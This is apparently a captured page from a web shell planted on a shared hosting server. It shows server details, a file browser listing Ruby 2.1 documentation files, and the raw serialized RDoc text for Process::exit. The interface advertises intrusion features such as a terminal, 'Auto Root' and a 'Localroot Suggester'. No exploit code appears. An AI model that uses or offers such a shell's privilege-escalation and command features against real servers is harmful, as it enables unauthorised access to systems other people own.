Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby21 /
share /
ri /
2.1.0 /
system /
Process /
Delete
Unzip
Name
Size
Permission
Date
Action
GID
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Status
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Sys
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
UID
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
abort-c.ri
486
B
-rw-r--r--
2023-07-26 17:52
argv0-c.ri
561
B
-rw-r--r--
2023-07-26 17:52
cdesc-Process.ri
7.53
KB
-rw-r--r--
2023-07-26 17:52
clock_getres-c.ri
1.77
KB
-rw-r--r--
2023-07-26 17:52
clock_gettime-c.ri
7.07
KB
-rw-r--r--
2023-07-26 17:52
daemon-c.ri
796
B
-rw-r--r--
2023-07-26 17:52
detach-c.ri
1.95
KB
-rw-r--r--
2023-07-26 17:52
egid%3d-c.ri
388
B
-rw-r--r--
2023-07-26 17:52
egid-c.ri
545
B
-rw-r--r--
2023-07-26 17:52
euid%3d-c.ri
372
B
-rw-r--r--
2023-07-26 17:52
euid-c.ri
508
B
-rw-r--r--
2023-07-26 17:52
exec-c.ri
3.54
KB
-rw-r--r--
2023-07-26 17:52
exit%21-c.ri
539
B
-rw-r--r--
2023-07-26 17:52
exit-c.ri
1.47
KB
-rw-r--r--
2023-07-26 17:52
fork-c.ri
1.42
KB
-rw-r--r--
2023-07-26 17:52
getpgid-c.ri
518
B
-rw-r--r--
2023-07-26 17:52
getpgrp-c.ri
528
B
-rw-r--r--
2023-07-26 17:52
getpriority-c.ri
1002
B
-rw-r--r--
2023-07-26 17:52
getrlimit-c.ri
1.01
KB
-rw-r--r--
2023-07-26 17:52
getsid-c.ri
688
B
-rw-r--r--
2023-07-26 17:52
gid%3d-c.ri
335
B
-rw-r--r--
2023-07-26 17:52
gid-c.ri
500
B
-rw-r--r--
2023-07-26 17:52
groups%3d-c.ri
637
B
-rw-r--r--
2023-07-26 17:52
groups-c.ri
516
B
-rw-r--r--
2023-07-26 17:52
initgroups-c.ri
960
B
-rw-r--r--
2023-07-26 17:52
kill-c.ri
1.56
KB
-rw-r--r--
2023-07-26 17:52
maxgroups%3d-c.ri
403
B
-rw-r--r--
2023-07-26 17:52
maxgroups-c.ri
494
B
-rw-r--r--
2023-07-26 17:52
pid-c.ri
463
B
-rw-r--r--
2023-07-26 17:52
ppid-c.ri
662
B
-rw-r--r--
2023-07-26 17:52
setpgid-c.ri
436
B
-rw-r--r--
2023-07-26 17:52
setpgrp-c.ri
374
B
-rw-r--r--
2023-07-26 17:52
setpriority-c.ri
707
B
-rw-r--r--
2023-07-26 17:52
setproctitle-c.ri
916
B
-rw-r--r--
2023-07-26 17:52
setrlimit-c.ri
2.97
KB
-rw-r--r--
2023-07-26 17:52
setsid-c.ri
559
B
-rw-r--r--
2023-07-26 17:52
spawn-c.ri
12.4
KB
-rw-r--r--
2023-07-26 17:52
times-c.ri
641
B
-rw-r--r--
2023-07-26 17:52
uid%3d-c.ri
379
B
-rw-r--r--
2023-07-26 17:52
uid-c.ri
498
B
-rw-r--r--
2023-07-26 17:52
wait-c.ri
2.21
KB
-rw-r--r--
2023-07-26 17:52
wait2-c.ri
832
B
-rw-r--r--
2023-07-26 17:52
waitall-c.ri
895
B
-rw-r--r--
2023-07-26 17:52
waitpid-c.ri
2.13
KB
-rw-r--r--
2023-07-26 17:52
waitpid2-c.ri
838
B
-rw-r--r--
2023-07-26 17:52
Save
Rename
U:RDoc::AnyMethod[iI" exit:ETI"Process::exit;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"AInitiates the termination of the Ruby script by raising the ;TI"J<code>SystemExit</code> exception. This exception may be caught. The ;TI"Hoptional parameter is used to return a status code to the invoking ;TI"environment. ;TI">+true+ and +FALSE+ of _status_ means success and failure ;TI"Crespectively. The interpretation of other integer values are ;TI"system dependent.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"begin ;TI" exit ;TI" puts "never get here" ;TI"rescue SystemExit ;TI"- puts "rescued a SystemExit exception" ;TI" end ;TI"puts "after begin block" ;T:@format0o; ; [I"<em>produces:</em>;T@o;; [I"$rescued a SystemExit exception ;TI"after begin block ;T; 0o; ; [I"QJust prior to termination, Ruby executes any <code>at_exit</code> functions ;TI"?(see Kernel::at_exit) and runs any object finalizers (see ;TI"$ObjectSpace::define_finalizer).;T@o;; [I")at_exit { puts "at_exit function" } ;TI"KObjectSpace.define_finalizer("string", proc { puts "in finalizer" }) ;TI" exit ;T; 0o; ; [I"<em>produces:</em>;T@o;; [I"at_exit function ;TI"in finalizer;T; 0: @fileI"process.c;T:0@omit_headings_from_table_of_contents_below0I"Lexit(status=true) Kernel::exit(status=true) Process::exit(status=true) ;T0[ I"(p1 = v1);T@6FI"Process;TcRDoc::NormalModule00